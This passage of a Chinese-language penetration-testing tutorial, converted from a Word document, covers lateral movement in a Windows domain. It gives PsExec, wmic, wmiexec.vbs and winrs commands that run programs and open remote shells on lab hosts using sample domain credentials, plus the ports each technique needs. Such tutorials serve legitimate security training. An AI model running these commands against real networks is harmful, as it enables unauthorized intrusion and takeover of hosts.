                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">PsExec.exe \\192.168.19.178 -u adtest\jeff1 -p test@123 cmd.exe</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1045" style="position:absolute;margin-left:90pt;margin-top:16.85pt;width:413pt;height:152pt;z-index:251675648;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:152.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1074" type="#_x0000_t75" style="width:413.05pt;height:151.75pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image076.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="553" height="205" src="https://www.2k8.org/content/uploadfile/202203/17/46806b7a.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:9.5pt;"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:9.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection23;">
                <h2 style="margin-top:.7pt;punctuation-wrap:simple;tab-stops:44.8pt;">
                        <a name="4.2.2 WMI"></a><span lang="EN-US" style="letter-spacing:-.05pt;"><span>4.2.2<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp; </span></span></span><span lang="EN-US">WMI</span>
                </h2>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">WMI(Windows<span style="letter-spacing:2.7pt;"> </span>Management<span style="letter-spacing:2.85pt;"> </span>Instrumentation<span style="letter-spacing:-.95pt;"> </span></span><span style="letter-spacing:-.95pt;">, </span><span lang="EN-US">Windows<span style="letter-spacing:.9pt;"> </span></span><span style="letter-spacing:.9pt;">管理规范<span lang="EN-US">) </span>是一项核心的<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">Windows </span>管理技术;用户可以使用<span lang="EN-US">WMI </span>管理本地和远程计算机。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.5pt;">&nbsp;</span>
                </p>
                <h4 style="margin-bottom:.0001pt;margin-left:48.15pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;tab-stops:48.2pt;text-indent:-42.2pt;">
                        <a name="4.2.2.1 WMI利用条件"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.2.1<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">WMI<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">利用条件<span lang="EN-US"></span></span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:12.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span>、<span lang="EN-US">WMI </span>服务开启(默认开启)<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:.35pt;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">2</span>、<span lang="EN-US">135 </span>端口未被过滤<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="558" height="271" src="https://www.2k8.org/content/uploadfile/202203/17/59113a19.jpg" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.5pt;">&nbsp;</span>
                </p>
                <h4 style="margin-left:51.25pt;punctuation-wrap:simple;tab-stops:51.3pt;text-indent:-45.3pt;">
                        <a name="4.2.2.2 利用wmic进行横向移动"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.2.2<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp; </span></span></span><span style="letter-spacing:1.7pt;">利用</span><span lang="EN-US">wmic<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">进行横向移动<span lang="EN-US"></span></span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:12.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        利用系统自带的工具<span lang="EN-US"> wmic </span>在目标主机上执行任意命令<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.35pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">wmic /node:192.168.19.178 /user:adtest\jeff1 /password:test@123 process call create "calc"</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1046" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:19.2pt;width:414pt;height:148pt;z-index:251676672;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:148.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1075" type="#_x0000_t75" style="width:414pt;height:148pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image080.jpg" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="555" height="200" src="https://www.2k8.org/content/uploadfile/202203/17/63817a75.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
缺点:无法回显命令<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection24;">
                <h4 style="margin-bottom:.0001pt;margin-left:6.0pt;margin-right:0cm;margin-top:1.2pt;punctuation-wrap:simple;text-indent:0cm;">
                        <a name="4.2.2.2 wmiexec.vbs"></a><span lang="EN-US">4.2.2.2 wmiexec.vbs</span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:13.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1047" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:49.2pt;width:412pt;height:181pt;text-indent:0;z-index:251677696;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:181.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1076" type="#_x0000_t75" style="width:411.9pt;height:180.65pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image082.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="552" height="244" src="https://www.2k8.org/content/uploadfile/202203/17/7b0f7eb7.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">wmiexec.vbs<span style="letter-spacing:.1pt;"> </span></span><span style="letter-spacing:.1pt;">是为了解决 </span><span lang="EN-US">wmic<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">无法回显命令而开发的一个工具,原理就是把数据先存</span><span style="letter-spacing:-.55pt;">到一个临时文件中,在每次读取完执行结果后就自动删除。可以用来回显执行命令的结果和</span><span style="letter-spacing:.05pt;">获取半交互式的</span><span lang="EN-US">shell</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.15pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:12.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1048" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:17.95pt;width:409pt;height:195pt;z-index:251678720;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:195.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1077" type="#_x0000_t75" style="width:409.35pt;height:194.55pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image084.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="548" height="263" src="https://www.2k8.org/content/uploadfile/202203/17/7faa2414.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">cscript wmiexec.vbs /cmd 192.168.19.178 adtest\jeff1 test@123 whoami</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection25;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1049" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:21.25pt;width:416pt;height:180pt;z-index:251679744;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:180.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1078" type="#_x0000_t75" style="width:416.25pt;height:180.4pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image086.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="557" height="243" src="https://www.2k8.org/content/uploadfile/202203/17/3dcc19ee.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">cscript wmiexec.vbs /shell 192.168.19.178 adtest\jeff1 test@123</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.5pt;">&nbsp;</span>
                </p>
                <h2 style="punctuation-wrap:simple;tab-stops:44.8pt;">
                        <a name="4.2.3 WinRM"></a><span lang="EN-US" style="letter-spacing:-.05pt;"><span>4.2.3<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp; </span></span></span><span lang="EN-US">WinRM</span>
                </h2>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:5.5pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        <span lang="EN-US">WinRM(Windows Remote Management<span style="letter-spacing:-.1pt;">)</span></span><span style="letter-spacing:-.1pt;">是 </span><span lang="EN-US">Microsoft<span style="letter-spacing:1.05pt;"> </span></span><span style="letter-spacing:1.05pt;">对</span><span lang="EN-US">WS-Management<span style="letter-spacing:-.2pt;"> </span></span><span style="letter-spacing:-.2pt;">协议的实现,<span lang="EN-US"> WS-Management</span></span><span lang="EN-US" style="letter-spacing:-.25pt;"> </span><span style="letter-spacing:-.25pt;">协议即一种基于标准简单对象访问协议</span><span style="letter-spacing:-.3pt;">(<span lang="EN-US">soap</span>)</span><span style="letter-spacing:-.35pt;">的防火墙友好协议,它让</span><span style="letter-spacing:-.45pt;">来自不同供应商的硬件和操作系统能够相互操作。</span><span lang="EN-US">windows<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">众多可以远程执行命令方式中的一种。<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.55pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.5pt;">&nbsp;</span>
                </p>
                <h4 style="margin-left:48.15pt;punctuation-wrap:simple;tab-stops:48.2pt;text-indent:-42.2pt;">
                        <a name="4.2.3.1 WinRM利用条件"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.3.1<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">WinRM<span style="letter-spacing:-.2pt;"> </span></span><span style="letter-spacing:-.2pt;">利用条件<span lang="EN-US"></span></span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:12.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span><span style="letter-spacing:.55pt;">、适用于</span><span lang="EN-US">win7<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">及以后的系统,</span><span lang="EN-US">win7<span style="letter-spacing:1.2pt;"> </span></span><span style="letter-spacing:1.2pt;">和</span><span lang="EN-US">server<span style="letter-spacing:.3pt;"> </span>08<span style="letter-spacing:-.1pt;"> </span></span><span style="letter-spacing:-.1pt;">默认关闭<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">2</span>、<span lang="EN-US">server<span style="letter-spacing:.6pt;"> </span>12<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">之后的版本才默认允许远程任意主机进行管理<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1050" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:18.75pt;width:416pt;height:87pt;z-index:251680768;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:87.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1079" type="#_x0000_t75" style="width:416pt;height:86.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image088.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="557" height="119" src="https://www.2k8.org/content/uploadfile/202203/17/4653a61c.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">3</span>、防火墙未过滤<span lang="EN-US"> 5985</span>、<span lang="EN-US">5986 </span>端口<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:13.5pt;">&nbsp;</span>
                </p>
                <h4 style="punctuation-wrap:simple;tab-stops:48.15pt;">
                        <a name="4.2.3.2 WINRS"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.3.2<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">WINRS</span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:13.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:8.05pt;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        <span lang="EN-US">winrs(windows remote shell)</span>是<span lang="EN-US">WinRM </span>的客户端<span lang="EN-US">,</span>需要管理员权限才能运行,可直接执行命令,也可以返回交互式<span lang="EN-US"> shell</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection26;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1051" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:21.7pt;width:415pt;height:4in;z-index:251681792;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:288.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1080" type="#_x0000_t75" style="width:414.5pt;height:287.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image090.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="556" height="387" src="https://www.2k8.org/content/uploadfile/202203/17/39f75716.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">winrs -r:192.168.19.100 -u:adtest\administrator -p:admin@124 "cmd</span>”<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:12.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">winrs -r:192.168.19.100 -u:adtest\administrator -p:admin@124 whoami</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1052" style="position:absolute;margin-left:90pt;margin-top:15.5pt;width:415pt;height:62pt;z-index:251682816;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:62.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
